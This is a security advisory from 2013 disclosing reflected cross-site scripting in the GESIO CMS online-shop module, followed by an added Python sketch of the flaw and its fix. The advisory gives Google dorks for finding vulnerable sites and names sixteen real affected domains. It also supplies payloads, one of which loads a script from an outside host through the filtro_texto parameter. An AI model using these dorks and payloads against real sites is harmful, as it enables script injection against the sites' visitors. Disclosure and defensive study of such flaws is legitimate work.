Tienda Online CMS Cross Site Scripting

Published: 19 Apr 2013. Reported by Ivan Sanchez. Type: packetstorm. Source: packetstormsecurity.com

Cross site scripting vulnerability in the Tienda Online module of the Software Gestión GESIO CMS, allowing attacker-controlled script (the advisory's "evil remote code") to be injected into the page. The vendor was notified multiple times. Affected sites include qualitycenter.es, greenhabit.es, and others. Remediation requires input validation and sanitization of each parameter.

Code
`+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
  
  
Author(s): Ivan Sanchez & Raul Diaz  
  
Product: Software Gestión GESIO   
Web:http://www.gesio.com/  
Versions: Modulo / Tienda Online - CM  
Date: 18/04/2013  
  
Vendor Notified: 18/04   
Vendor Notified again: 19/04  
  
Extract:  
http://www.gesio.com/tienda-online-cms-89-50-431/  
"Your online shop connected to your daily invoicing. You will invoice with the same system you sell online with.  
At GESIO® we believe an online management system should have the ability to develop an Online Shop"   
  
  
GOOGLE DORKS:  
------------  
  
allintext:POLÍTICA DE PROTECCIÓN DE DATOS -Software Gestión GESIO®  
  
inurl:cms/site_0003  
  
  
Sites affected   
--------------------  
  
ALL SITES USING THIS CM  
  
http://www.qualitycenter.es/lp/  
http://www.greenhabit.es/lp/  
http://www.latiendadelhormigonimpreso.com/lp/  
http://www.minisub.es/lp/  
http://www.vitalarchery.com/lp/  
http://www.palacios-congresos-es.com/lcli/  
http://www.aulasconsoftware.com/lp/  
http://www.arthulencourt.eu/lp/  
http://www.soltercam.com/lp/  
http://www.sol-i-vent.es/lp/  
http://www.ale-hop.org/lp/  
http://creugal-hobby.com/lp/  
http://www.xipnet.es/lp/  
http://www.canterbury.es/lp/  
http://ociostock.com/lp/  
http://guatebloem.com/productos_listado.php  
  
much more....  
  
Attacks >>>>>>>>>>>>>>>>>>>  
  
  
XSS & REMOTE INJECTION CODE:  
---------------------------  
  
'">><marquee><h1>EvilCode Team</h1></marquee>  
  
Or  
  
"><script src=http://nullcode.com.ar/code/scripts/EVIL.js></script> EXTERNAL EVIL CODE !  
  
  
Parameter Affected:  
-------------------  
  
--form 1 --  
  
http://www.sites/comunicados_listado.php?filtro_texto= INJECT HERE  
  
and much more...  
  
Remediation:  
------------  
  
Could you please validate the input and sanitize each parameter.  
  
  
Thank you so much!  
  
  
  
NULL CODE SERVICES [ www.evilcode.com.ar ] Hunting Security Bugs!  
+=============================================================================================+  
+ Software Gestión GESIO & XSS & Allow Execute Evil Remote Code +  
+=============================================================================================+  
`
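As an added defensive example that is not part of the advisory or of the vendor's code, the following Python sketches the reflected-XSS pattern the advisory reports on the `filtro_texto` parameter of `comunicados_listado.php`, beside the remediation it asks for: output encoding of whatever is echoed back into the page, plus allow-list validation of the parameter. The host `example.invalid`, the rendering functions and the allow-list regex are assumptions; the injected string is the advisory's own first payload.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample requests modelled on the affected endpoint. The host is a
# placeholder; the second query string carries the advisory's first payload,
# percent-encoded as a browser would send it.
SAMPLE_URLS = [
    "http://example.invalid/comunicados_listado.php?filtro_texto=hormigon",
    "http://example.invalid/comunicados_listado.php?filtro_texto="
    "%27%22%3E%3E%3Cmarquee%3E%3Ch1%3EEvilCode%20Team%3C/h1%3E%3C/marquee%3E",
]


def get_filtro_texto(url):
    """Extract the decoded filtro_texto parameter from a request URL."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get("filtro_texto", [""])[0]


def render_vulnerable(filtro):
    """The defect the advisory describes: the parameter is echoed unencoded
    into both an attribute value and the page body, so '">' closes the
    attribute and the rest is parsed as markup."""
    return (f'<input name="filtro_texto" value="{filtro}">'
            f"<h2>Resultados para: {filtro}</h2>")


def render_hardened(filtro):
    """Output encoding: escape <, >, &, " and ' so the value is inert both in
    a quoted attribute and in element content."""
    safe = html.escape(filtro, quote=True)
    return (f'<input name="filtro_texto" value="{safe}">'
            f"<h2>Resultados para: {safe}</h2>")


# Allow-list for a free-text search filter (hypothetical policy): letters,
# digits, whitespace, common Spanish accents and a few punctuation marks,
# at most 100 characters. Anything else is rejected rather than "cleaned".
FILTER_RE = re.compile(r"^[\w\sáéíóúñÁÉÍÓÚÑ.,-]{0,100}$")


def validate_filtro(filtro):
    """Input validation: return the trimmed value or raise ValueError."""
    if not FILTER_RE.match(filtro):
        raise ValueError("filtro_texto contains characters outside the allow-list")
    return filtro.strip()


def breaks_out(rendered):
    """Check whether unescaped markup from the input reached the page."""
    lowered = rendered.lower()
    return "<marquee>" in lowered or "<script" in lowered


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        value = get_filtro_texto(url)
        print("vulnerable breaks out:", breaks_out(render_vulnerable(value)))
        print("hardened breaks out:  ", breaks_out(render_hardened(value)))
        try:
            print("validated:", validate_filtro(value))
        except ValueError as exc:
            print("rejected:", exc)
```

Encoding at the output point is the primary fix, because it neutralises any reflected value regardless of what the validation layer lets through; the allow-list is a second, independent check that also shortens the error-handling path for obviously malformed requests.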
